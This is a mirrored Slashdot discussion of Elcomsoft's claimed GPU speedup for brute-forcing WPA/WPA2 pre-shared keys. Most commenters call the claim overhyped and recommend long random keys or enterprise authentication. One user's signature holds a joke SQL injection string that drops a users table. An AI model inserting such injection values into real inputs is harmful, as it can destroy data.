Slashdot Mirror

← Back to Stories (view on slashdot.org)

Elcomsoft Claims WPA/WPA2 Cracking Breakthrough

Posted by timothy on from the it-budget-excuse-par-excellence dept.

secmartin writes "Russian security firm Elcomsoft has released software that uses Nvidia GPUs to speed up the cracking of WPA and WPA2 keys by a factor of 100. Since the software allows them to network thousands of PCs, this anouncement effectively signals the death of wireless networking in business networks; any network handling sensitive data should start using VPN encryption on machines connecting over Wi-Fi networks, or stop using these networks altogether."

21 of 349 comments (clear)

  1. Looks Like I'm Safe by linuxmeepster · · Score: 5, Interesting

    "Brute Force Attack will take up to 128299838271 years" at 500,000 passwords a second. ElcomSoft is claiming a 20x improvement in speed, but that won't make a dent into an exponential-sized problem. See http://lastbit.com/pswcalc.asp for calculation.

    1. Re:Looks Like I'm Safe by Anonymous Coward · · Score: 5, Informative

      Uh, where are you getting that number? (26*2+1)^10 works out to 1.7488747 * 10^17. Wouldn't it be more like ((26*2)+10)^10, assuming no spaces?

    2. Re:Looks Like I'm Safe by Sasayaki · · Score: 5, Funny

      "Brute Force Attack will take up to 128299838271 years"

      Look, I understand that's enough security for your mortals, but I plan to live forever. I don't want someone getting my data just after my 128,299,838,295th birthday!

      --
      Check out my sci-fi book "Lacuna" at http://goo.gl/MVxX8
    3. Re:Looks Like I'm Safe by ksd1337 · · Score: 5, Funny

      I don't want someone getting my data just after my 128,299,838,295th birthday!

      Tell us if they release Duke Nukem Forever by your 128 billionth birthday.

    4. Re:Looks Like I'm Safe by tftp · · Score: 5, Funny

      I recently moved up 23 chars, but it won't calculate that for me.

      Do not worry, the keylogger inside of your keyboard has plenty of memory.

  2. Does this surprise anyone? by Mad+Merlin · · Score: 5, Insightful

    This doesn't surprise me. Anyone who wasn't already assuming that anything you sent via wireless was already in the hands of your enemies (unencrypted) is a bit naive.

    --
    Game! - Where the stick is mightier than the sword!
    1. Re:Does this surprise anyone? by Anonymous Coward · · Score: 5, Insightful

      I don't care how you're accessing the net, if it's important encrypt it.

  3. Rotate your keys by Legion_SB · · Score: 5, Insightful

    With good keys, even a 100x increase in cracking speed is still not fast

    Don't use a little 8-character passphrase. Use long keys, and don't just leave them in place forever. Change them periodically.

    --
    'a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%'... if you're reading this, it didn't work.
  4. Newsflash: Most "Business Networks" Aren't Secure by Llywelyn · · Score: 5, Insightful

    Most businesses I've seen have had easily guessable passwords, used open relays, or WEP encryption. Many don't change their keys even after firing someone. Saying that this is a "death knell" is serious hyperbole since, for many companies, convenience trumps hardened security.

    That said, the biggest risk is still always going to be insiders and former insiders who won't need to crack into the wireless network: they will already know how to get access.

    --
    Integrate Keynote and LaTeX
  5. Why does wireless security suck so bad? by mcrbids · · Score: 5, Insightful

    Seriously. We've had a number of standards with names like "Wired Equivalency Protocol" and "Wifi Protected Access" and yet they seem to be falling, one-by-one, to relatively trivial attacks. I'm not saying that WPA is as bad as WEP, but how come they can't copy/paste something as good as good old-fashioned SSL?

    SSL has withstood the tests of time, over, and over, and over, and over again. SSL is the gold standard for encryption. It's used on every HTTPS website, it's used for SSH, it's used as part of kerberos, IMAPS, POPS, TLS, and just about every other good-quality security tool.

    So why are wireless chipset manufacturers trying to re-invent the wheel, when it's widely known that these kinds of wheels are FRIGGEN HARD to re-invent well?

    Start with normal, unencrypted wireless. Getting that to work was solved long ago. Embed an SSL engine into your wireless device, with a randomly generated private key. Provide a means to access the public key, and copy/paste that key into your high security wireless driver. If you want to be paranoid, your local driver generates a private/public key pair as well, and that can be copy/pasted to your wireless device.

    Done! Now you *KNOW* that if you are accessing the Internet through the driver, you are doing so through the correct wireless hotspot. Who cares about wireless MITM attacks at that point? The SSL protocol *ASSUMES* that there are MITM attempts, and foils them quite effectively, over the equally open and unsecured Internet.

    Seriously, folks. This is a problem that was solved over a decade ago. Why are we doing this again?

    --
    I have no problem with your religion until you decide it's reason to deprive others of the truth.
    1. Re:Why does wireless security suck so bad? by swillden · · Score: 5, Informative

      Seriously. We've had a number of standards with names like "Wired Equivalency Protocol" and "Wifi Protected Access" and yet they seem to be falling, one-by-one, to relatively trivial attacks.

      "Seem" is the key word in this paragraph.

      The claimed attack is nothing more than a brute force search on WPA/WPA2 pre-shared keys, a search that will fail if the keys are well-chosen. It has no effect whatsoever on WPA or WPA2 when used with any of the EAP authentication modes. But PSK requires the network admin to choose a key, and the key is typically chosen by typing in a passphrase. If that passphrase is weak, then given enough computation power an attacker can guess it. Big surprise.

      WPA and WPA2 ARE just as solid as SSL. The only difference is that everyone knows that if you're doing SSL you should use a good random number generator to help generate your key pair and to generate the session keys.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    2. Re:Why does wireless security suck so bad? by databeast · · Score: 5, Informative

      Better yet, use 802.1x (WPA + RADIUS) which completely avoids all the key-exchange weaknesses of WEP and WPA.

    3. Re:Why does wireless security suck so bad? by eric2hill · · Score: 5, Funny

      Almost, but your key may not be as truly random as you might think. Post your key here so we can verify it's really secure.

      --
      LOAD "SIG",8,1
      LOADING...
      READY.
      RUN
  6. F@H by Kooty-Sentinel · · Score: 5, Interesting

    I wonder how long it would take for the entire Folding@Home grid would take to crack a single WAP/WAP2 key. Can anyone do the math?

    --
    Your evaluation period for Productivity 1.0 has ended. Please purchase more coffee to continue using this product.
  7. Oh, pull the other leg... by subreality · · Score: 5, Interesting

    This is seriously overhyped. #1:

    This anouncement effectively signals the death of wireless networking in business networks;

    Bullshit. The underlying encryption is based on AES*. AES is not a toy algorithm, and is designed to defend against specialized cracking hardware, and all other known attacks. It is *plenty* strong enough to hold up to a 100X increase in cracking speed, as long as you use good keys, which hopefully you are in a business environment.

    I'm willing to believe that a key handling vulnerability might exist in WPA, or a flaw in AES, but the notion that brute force has brought about the death of WPA in business networks is just absurd. At best, this is a reminder to use good keys.

    any network handling sensitive data should start using VPN encryption on machines connecting over Wi-Fi networks, or stop using these networks altogether.

    Do you think your VPN software has a better underlying algorithm than AES?

    * Unless you're using TKIP, which is a toy algorithm, which exists for backwards hardware compatibility, and in my experience isn't used by anyone who cares about security... But even there, the potential attack vectors are through algorithm weaknesses, not brute forcing the keys.

  8. Summary is quite silly! by Qwavel · · Score: 5, Informative

    Businesses that are serious about their security use one of the many types of WPA-Enterprise. The method described in this article only applies to WPA-Personal which is targeted at home users.

    Those businesses that do use WPA-Personal can simply institute a policy that requires better passwords to secure them against this exploit.

    Some businesses will continue to use WPA-Personal with poor passwords, and that's fine, but those businesses are probably not too worried about security and have many other bigger vulnerabilities.

    So, the claim that "this anouncement effectively signals the death of wireless networking in business networks" is ridiculous.

  9. Re:You can get hard passwords by mlts · · Score: 5, Informative

    I personally recommend KeePass for password generation. It can generate 63 char passwords for WPA/WPA2 keys with cryptographically random unpredictability as it uses keyboard/mouse movements as part of seeding. Because its done on the local machine, there is no chance of the password being leaked as compared over the web. With a 63 character password, that is far more entropy than the 128 or 256 bits keys used for AES, so for someone to guess a password of that length, they either have to be able to brute force AES at full strength, or find a weakness in the algorithm's implementation.

    I generate a KeePass password, save it to a USB flash drive, then paste it into my router's config. I then take the USB flash drive to the physical machines and do a copy and paste of the 63 char key into their network preferences. This is a lot easier than typing it. Should I lose the key... not hard to fix -- generate another one and rekey the 3-4 machines on my network. Because the WPA/WPA2 key is easily resettable with physical access to the machines, there is no reason to go less than the maximum character length, and it doesn't matter if the password gets forgotten, as long as you remember your router and machine's access passwords. (This for a home network. Businesses should use a RADIUS server where all the machines are not reliant on a single shared encryption key.)

    If you have to use fewer characters, I'd say never use fewer than 20 characters, but even that is cutting it thin, factoring in Moor's law, botnets, and usage of GPUs for additional number crunching.

  10. We're okay by Anonymous Coward · · Score: 5, Funny

    Hah! My company is okay- we're only using MAC filtering for our security, none of this insecure WEP/WPA crap.

  11. ..since as we know, ... by Marcika · · Score: 5, Funny

    ... Most people use passwords. Some people use passphrases. Bruce Schneier uses an epic passpoem, detailing the life and works of seven mythical Norse heroes.

  12. Bullshit, FUD and the worst summary I've ever read by Anonymous Coward · · Score: 5, Insightful

    Using GPUs to crack is not "new", it's a well known tachnique. Furthermore, an increase of a factor a 100 is insignificant relative to the number of years it would take to crack a key, hence the crypto is not weakened, dispelling their whole "death of wireless networking" doommonger bullshit. The only thing this actually does is speed up already feasible attacks against bad passphrases, nothing new, and certainly not a "breakthrough".

  13. Re:You can get hard passwords by Hork_Monkey · · Score: 5, Informative

    If you're setting up a 200 device wireless network with WPA PSK, you're doing it wrong.